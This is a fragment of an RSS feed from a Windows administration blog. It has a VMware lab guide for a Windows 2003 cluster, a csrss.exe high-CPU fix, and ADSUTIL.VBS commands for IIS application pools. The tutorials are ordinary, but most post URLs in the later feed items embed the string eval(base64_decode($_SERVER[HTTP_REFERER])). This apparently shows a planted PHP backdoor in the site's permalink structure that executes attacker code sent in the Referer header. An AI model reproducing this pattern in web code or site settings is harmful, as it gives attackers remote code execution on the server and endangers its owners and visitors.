<p class="MsoNormal">Install VMware server edition [Tested on version 5.x]</p>
<p class="MsoNormal"><strong>Installation and Configuration </strong></p>
<p class="MsoNormal">Starting point is the preparation of a Windows 2003 cluster for Exchange 2003 with the following hardware specs.<span> </span></p>
<p class="MsoNormal">ClusNode1 – System partition 4 Gb</p>
<p class="MsoNormal">ClusNode 2 – System partition 4 Gb</p>
<p class="MsoNormal">•<span> </span>Shared storage – Quorum – 500 Mb</p>
<p class="MsoNormal">•<span> </span>Shared storage – Databases – 4 Gb <span> </span>[Exchange Or SQL]</p>
<p class="MsoNormal">•<span> </span>Shared storage – Log files – 1 Gb <span> </span>[Exchange Or<span> </span>SQL ]<span> </span></p>
<p class="MsoNormal">Two network interfaces (NICs) need to be configured per node, one for public cluster NIC and another for private NIC will be used for cluster heartbeat.</p>
<p class="MsoNormal">If you have AD/Domain installed on your test environment else install AD/Domain controller for testing environment then create cluster account or and create account with setting “Password never Expire” and “password can not be changed”.</p>
<p class="MsoNormal"><strong>Start Vmware Virtual machine creation</strong></p>
<p class="MsoNormal">Create new virtual machine</p>
<p class="MsoNormal"><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"  o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"  stroked="f"> <v:stroke joinstyle="miter" /> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0" /> <v:f eqn="sum @0 1 0" /> <v:f eqn="sum 0 0 @1" /> <v:f eqn="prod @2 1 2" /> <v:f eqn="prod @3 21600 pixelWidth" /> <v:f eqn="prod @3 21600 pixelHeight" /> <v:f eqn="sum @0 0 1" /> <v:f eqn="prod @6 1 2" /> <v:f eqn="prod @7 21600 pixelWidth" /> <v:f eqn="sum @8 21600 0" /> <v:f eqn="prod @7 21600 pixelHeight" /> <v:f eqn="sum @10 21600 0" /> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect" /> <o:lock v:ext="edit" aspectratio="t" /> </v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:344.25pt;  height:129.75pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image001.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image001.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><img class="aligncenter" title="1" src="http://winadmin.co.uk/Vmware/1.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="461" height="198" /><!--[endif]--></p>
<p class="MsoNormal">Guest OS can be installed on <em>Virtual IDE drive</em> created in VMware</p>
<p class="MsoNormal">Open new Virtual machine Wizard</p>
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1026" type="#_x0000_t75"  style='width:231.75pt;height:94.5pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image003.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image003.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><img class="aligncenter" src="http://winadmin.co.uk/Vmware/2.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="312" height="130" title="Windows 2003 Cluster On Vmware [lab Environment]" /><!--[endif]--></p>
<p class="MsoNormal">NEXT</p>
<p class="MsoNormal"><img class="alignnone" src="http://winadmin.co.uk/Vmware/3.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="306" height="104" title="Windows 2003 Cluster On Vmware [lab Environment]" /></p>
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1027" type="#_x0000_t75"  style='width:227.25pt;height:76.5pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image005.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image005.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><!--[endif]--></p>
<p class="MsoNormal">
<p class="MsoNormal">
<p class="MsoNormal">
<p class="MsoNormal">
<p class="MsoNormal">Choose Custom &gt;&gt; click NEXT</p>
<p class="MsoNormal"><img class="aligncenter" src="http://winadmin.co.uk/Vmware/4.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="309" height="49" title="Windows 2003 Cluster On Vmware [lab Environment]" /></p>
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1028" type="#_x0000_t75"  style='width:227.25pt;height:33.75pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image007.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image007.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><!--[endif]--></p>
<p class="MsoNormal">Select Windows 2003 Ent &gt;&gt; Click NEXT</p>
<p class="MsoNormal"><img class="aligncenter" src="http://winadmin.co.uk/Vmware/5.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="312" height="94" title="Windows 2003 Cluster On Vmware [lab Environment]" /></p>
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1029" type="#_x0000_t75"  style='width:234pt;height:70.5pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image009.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image009.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><!--[endif]--></p>
<p class="MsoNormal">Give Friendly name to your Virtual Machine and its location [Store it on diff partition other that system]</p>
<p class="MsoNormal">Click Next.</p>
<p class="MsoNormal"><img class="aligncenter" src="http://winadmin.co.uk/Vmware/6.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="294" height="84" title="Windows 2003 Cluster On Vmware [lab Environment]" /></p>
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1030" type="#_x0000_t75"  style='width:218.25pt;height:60.75pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image011.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image011.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><!--[endif]--></p>
<p class="MsoNormal">On next page, allocate RAM memory to 1 GB [Recommended]</p>
<p class="MsoNormal"><img class="aligncenter" src="http://winadmin.co.uk/Vmware/7.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="312" height="120" title="Windows 2003 Cluster On Vmware [lab Environment]" /></p>
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1031" type="#_x0000_t75"  style='width:229.5pt;height:90pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image013.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image013.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><!--[endif]--></p>
<p class="MsoNormal">For Network type select Bridge Networking, click next</p>
<p class="MsoNormal">[This NIC will be used for public Access]</p>
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1032" type="#_x0000_t75"  style='width:234pt;height:98.25pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image015.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image015.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><img class="aligncenter" src="http://winadmin.co.uk/Vmware/8.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="312" height="131" title="Windows 2003 Cluster On Vmware [lab Environment]" /><!--[endif]--></p>
<p class="MsoNormal">Create Virtual Machine Disk, Click NEXT.</p>
<p class="MsoNormal"><img class="aligncenter" src="http://winadmin.co.uk/Vmware/9.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="312" height="131" title="Windows 2003 Cluster On Vmware [lab Environment]" /></p>
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1033" type="#_x0000_t75"  style='width:234pt;height:98.25pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image017.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image017.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><!--[endif]--></p>
<p class="MsoNormal">Give Disk Capacity, I recommend 4-5 GB Click Next</p>
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1034" type="#_x0000_t75"  style='width:235.5pt;height:203.25pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image019.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image019.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><img class="aligncenter" src="http://winadmin.co.uk/Vmware/10.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="314" height="271" title="Windows 2003 Cluster On Vmware [lab Environment]" /><!--[endif]--></p>
<p class="MsoNormal">Give the location where virtual disk information would be store</p>
<p class="MsoNormal">[This is the file that we will need to edit for sharing disk resource]</p>
<p class="MsoNormal">Click Advance</p>
<p class="MsoNormal"><img class="aligncenter" src="http://winadmin.co.uk/Vmware/11.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="314" height="155" title="Windows 2003 Cluster On Vmware [lab Environment]" /></p>
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1035" type="#_x0000_t75"  style='width:232.5pt;height:116.25pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image021.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image021.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><!--[endif]--></p>
<p class="MsoNormal"><em>Select IDE 0.1,</em> [This is the disk on which Virtual machine’s OS will be installed].</p>
<p class="MsoNormal">Click Finish.</p>
<p class="MsoNormal">Now additional component need to be added, like second NIC, and 2 SCSI HDD as shared disk resource.</p>
<p class="MsoNormal">Now click on “edit virtual machine setting”</p>
<p class="MsoNormal"><img class="aligncenter" src="http://winadmin.co.uk/Vmware/12.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="401" height="118" title="Windows 2003 Cluster On Vmware [lab Environment]" /></p>
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1036" type="#_x0000_t75"  style='width:374.25pt;height:86.25pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image023.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image023.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><!--[endif]--></p>
<p class="MsoNormal">
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1037" type="#_x0000_t75"  style='width:252.75pt;height:213.75pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image025.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image025.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><!--[endif]--></p>
<p class="MsoNormal"><img class="aligncenter" src="http://winadmin.co.uk/Vmware/13.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="311" height="224" title="Windows 2003 Cluster On Vmware [lab Environment]" /></p>
<p class="MsoNormal">Add &gt;click “NEXT” on next page</p>
<p class="MsoNormal">Select Hard Disk click “NEXT”</p>
<p class="MsoNormal"><img class="aligncenter" src="http://winadmin.co.uk/Vmware/14.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="240" height="276" title="Windows 2003 Cluster On Vmware [lab Environment]" /></p>
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1038" type="#_x0000_t75"  style='width:187.5pt;height:256.5pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image027.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image027.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><!--[endif]--></p>
<p class="MsoNormal">Select option “Create New virtual disk”</p>
<p class="MsoNormal">
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1039" type="#_x0000_t75"  style='width:363.75pt;height:157.5pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image029.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image029.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><img class="aligncenter" src="http://winadmin.co.uk/Vmware/15.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="489" height="211" title="Windows 2003 Cluster On Vmware [lab Environment]" /><!--[endif]--></p>
<p class="MsoNormal">Give disk space 500mb only</p>
<p class="MsoNormal">
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1040" type="#_x0000_t75"  style='width:360.75pt;height:150.75pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image031.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image031.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><img class="aligncenter" src="http://winadmin.co.uk/Vmware/16.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="483" height="202" title="Windows 2003 Cluster On Vmware [lab Environment]" /><!--[endif]--></p>
<p class="MsoNormal">Specify this disk as Quorum disk</p>
<p class="MsoNormal"><img class="aligncenter" src="http://winadmin.co.uk/Vmware/17.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="484" height="179" title="Windows 2003 Cluster On Vmware [lab Environment]" /></p>
<p class="MsoNormal">Click on “Advance”</p>
<p class="MsoNormal"><img class="alignnone" src="http://winadmin.co.uk/Vmware/18.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="484" height="179" title="Windows 2003 Cluster On Vmware [lab Environment]" /></p>
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1042" type="#_x0000_t75"  style='width:359.25pt;height:137.25pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image035.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image035.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><!--[endif]--></p>
<p class="MsoNormal"><em>Select SCSI 0:0 as Virtual Device Node</em> and click on ‘Finish’.<span> </span></p>
<p class="MsoNormal">Repeat the steps above for the remaining shared disks, those are needed.<span> </span></p>
<p class="MsoNormal">Be Aware! The shared disks must be added as SCSI as this is necessary for the correct functioning of MSCS.<span> </span></p>
<p class="MsoNormal">
<p class="MsoNormal">Now an extra NIC is needed.</p>
<p class="MsoNormal">Do same processes mention above, but select Ethernet Adapter on both VM’s</p>
<p class="MsoNormal"><img class="aligncenter" src="http://winadmin.co.uk/Vmware/19.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="249" height="363" title="Windows 2003 Cluster On Vmware [lab Environment]" /></p>
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1043" type="#_x0000_t75"  style='width:186pt;height:268.5pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image037.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image037.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><!--[endif]--></p>
<p class="MsoNormal">Select “Host-Only” click finish</p>
<p class="MsoNormal">This NIC will be used for “Hertbeat”</p>
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1044" type="#_x0000_t75"  style='width:383.25pt;height:249.75pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image039.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image039.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><img class="aligncenter" src="http://winadmin.co.uk/Vmware/20.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="504" height="334" title="Windows 2003 Cluster On Vmware [lab Environment]" /><!--[endif]--></p>
<p class="MsoNormal">Complete configuration must look like this</p>
<p class="MsoNormal"><img class="aligncenter" src="http://winadmin.co.uk/Vmware/21.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="346" height="309" title="Windows 2003 Cluster On Vmware [lab Environment]" /></p>
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1045" type="#_x0000_t75"  style='width:259.5pt;height:276pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image041.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image041.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><!--[endif]--></p>
<p class="MsoNormal">Click on ‘OK’ to close the configuration editor.<span> </span></p>
<p class="MsoNormal">Start Windows Explorer and navigate to the folder where the Virtual Machine is created.</p>
<p class="MsoNormal">Example it is <em>Z:\VMware virtual machines\clusternodeA\name .vmx</em>).<span> </span></p>
<p class="MsoNormal">Open with Notepad the file &lt;vm name&gt;.vmx and add at the end the following line:</p>
<p class="MsoNormal"><em>Disk.locking = FALSE<span> </span></em></p>
<p class="MsoNormal">This makes sure that both nodes can access the same disks at the same time in case of cluster failover. MSCS is intelligent enough to prevent that both nodes actually do this at the same time.</p>
<p class="MsoNormal"><em>Using the VMWare SCSI Driver in a New Virtual Machine<span> </span></em></p>
<p class="MsoNormal">To use the driver when you are installing a Windows Server 2003 or Windows XP guest operating system in a newly created virtual machine, follow these steps.<span> </span>Download the driver from <em>hxxp://www.vmware.com/download/downloadscsi.html</em></p>
<p class="MsoNormal"><em>Save the downloaded file &#8212; vmscsi_&lt;xxxx&gt;.flp</em></p>
<p class="MsoNormal">Now the SCSI Hard-Disk those were added need to be configured</p>
<p class="MsoNormal">Edit the virtual machine configuration, click on added SCSI HDD and change the setting as shown below.</p>
<p class="MsoNormal"><img class="aligncenter" src="http://winadmin.co.uk/Vmware/22.PNG" alt=" Windows 2003 Cluster On Vmware [Lab Environment]" width="337" height="212" title="Windows 2003 Cluster On Vmware [lab Environment]" /></p>
<p class="MsoNormal"><!--[if gte vml 1]><v:shape id="_x0000_i1046" type="#_x0000_t75"  style='width:253.5pt;height:159pt'> <v:imagedata src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image043.png" mce_src="file:///C:\DOCUME~1\Mithil\LOCALS~1\Temp\msohtml1\01\clip_image043.png"   o:title="" /> </v:shape><![endif]--><!--[if !vml]--><!--[endif]--></p>
<p class="MsoNormal"><em>Make same changes to remaining SCSI hard-disk only. Virtual device node must me SCSI 0.1 as it would be another SCSI Device</em></p>
<p class="MsoNormal">Start the VM installation one by one [not simultaneously it will cause corrupt the hard-disk and shared data. Same precaution must be taken whenever Cluster node is rebooted.</p>
<p class="MsoNormal">
<p class="MsoNormal">Now you are ready to install cluster service on newly installed VM.</p>
]]></content:encoded>
			<wfw:commentRss>http://winadmin.co.uk/2008/11/12/windows-2003-cluster-on-vmware-lab-environment/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>100% of CPU usage by Csrss.exe</title>
		<link>http://winadmin.co.uk/2008/10/26/100-of-cpu-usage-by-csrssexe/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
		<comments>http://winadmin.co.uk/2008/10/26/100-of-cpu-usage-by-csrssexe/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments</comments>
		<pubDate>Sun, 26 Oct 2008 07:35:09 +0000</pubDate>
		<dc:creator>Gabriel</dc:creator>
		
		<category><![CDATA[IIS]]></category>

		<category><![CDATA[100%]]></category>

		<category><![CDATA[2003]]></category>

		<category><![CDATA[corrupt]]></category>

		<category><![CDATA[Csrss]]></category>

		<category><![CDATA[Csrss.exe]]></category>

		<category><![CDATA[profile]]></category>

		<category><![CDATA[user]]></category>

		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://winadmin.co.uk/?p=94</guid>
		<description><![CDATA[100% of CPU usage by Csrss.exe
Csrss stands for client/server run-time subsystem which is essential and must be running all the times.
It is responsible for console windows, creating and/or deleting threads etc.
The csrss.exe file is located in the folder C:\Windows\System32, if you find it at any other location then it may be a virus or spyware.
Csrss.exe [...]]]></description>
			<content:encoded><![CDATA[<p><strong>100% of CPU usage by Csrss.exe</strong></p>
<p><strong>Csrss</strong> stands for <strong>client/server run-time subsystem</strong> which is essential and must be running all the times.<br />
It is responsible for console windows, creating and/or deleting threads etc.<br />
The <strong>csrss.exe</strong> file is located in the folder C:\Windows\System32, if you find it at any other location then it may be a virus or spyware.<br />
<strong>Csrss.exe</strong> process manages most graphical commands in Windows which is important for the stable and secure running of computer.</p>
<p>Whenever Csrss.exe utilizes 100% of the CPU on right clicking an item in Windows Explorer or on the desktop then it may be an issue with user profile, it may be corrupted.</p>
<p><strong>Fix :-</strong></p>
<p>First of all take the complete backup of your &#8220;My Documents&#8221; folder and all important data stored in your profile.<br />
Log in with an account which has administrative privileges and open the user profiles list.<br />
To retrieve the list of local user profiles right click on &#8220;My Computer&#8221; icon and select Properties,<br />
click on Advanced tab,<br />
click Settings under User Profiles,<br />
select your profile from the list, and then click Delete.</p>
<p>Logoff, and then log back on as yourself. A new profile will be created when you log on.</p>
]]></content:encoded>
			<wfw:commentRss>http://winadmin.co.uk/2008/10/26/100-of-cpu-usage-by-csrssexe/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to create custom Application Pool manually</title>
		<link>http://winadmin.co.uk/2008/10/19/how-to-create-custom-application-pool-manually/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
		<comments>http://winadmin.co.uk/2008/10/19/how-to-create-custom-application-pool-manually/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments</comments>
		<pubDate>Sun, 19 Oct 2008 11:10:51 +0000</pubDate>
		<dc:creator>Gabriel</dc:creator>
		
		<category><![CDATA[IIS]]></category>

		<category><![CDATA[2003]]></category>

		<category><![CDATA[ADSUTIL.VBS]]></category>

		<category><![CDATA[application]]></category>

		<category><![CDATA[pool]]></category>

		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://winadmin.co.uk/?p=89</guid>
		<description><![CDATA[ADSUTIL.VBS is the file that plays important role in creating and managing application pools.
It is a IIS administration utility that uses VBScript to manipulate the IIS configuration.
[NOTE - You must be a member of the Administrators group on the local computer to run scripts and executables ]
Following is the example to create a new application [...]]]></description>
			<content:encoded><![CDATA[<p><strong>ADSUTIL.VBS</strong> is the file that plays important role in creating and managing <strong>application pools</strong>.<br />
It is a IIS administration utility that uses VBScript to manipulate the IIS configuration.</p>
<p>[NOTE - You must be a member of the Administrators group on the local computer to run scripts and executables ]</p>
<p>Following is the example to create a new application pool called &#8220;NewPool&#8221; and configure it to use a custom Application Pool identity of domain\username with a password of pass :-</p>
<p>CSCRIPT %SYSTEMDRIVE%\Inetpub\AdminScripts\ADSUTIL.VBS CREATE w3svc/AppPools/NewPool IIsApplicationPool<br />
CSCRIPT %SYSTEMDRIVE%\Inetpub\AdminScripts\ADSUTIL.VBS SET w3svc/AppPools/MyAppPool/WamUserName &#8220;domain\username&#8221;<br />
CSCRIPT %SYSTEMDRIVE%\Inetpub\AdminScripts\ADSUTIL.VBS SET w3svc/AppPools/MyAppPool/WamUserPass &#8220;pass&#8221;<br />
CSCRIPT %SYSTEMDRIVE%\Inetpub\AdminScripts\ADSUTIL.VBS SET w3svc/AppPools/MyAppPool/AppPoolIdentityType 3</p>
<p>After executing above commands you will find a new application pool &#8220;NewPool&#8221; created under &#8220;Application Pools&#8221; in IIS.</p>
]]></content:encoded>
			<wfw:commentRss>http://winadmin.co.uk/2008/10/19/how-to-create-custom-application-pool-manually/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>

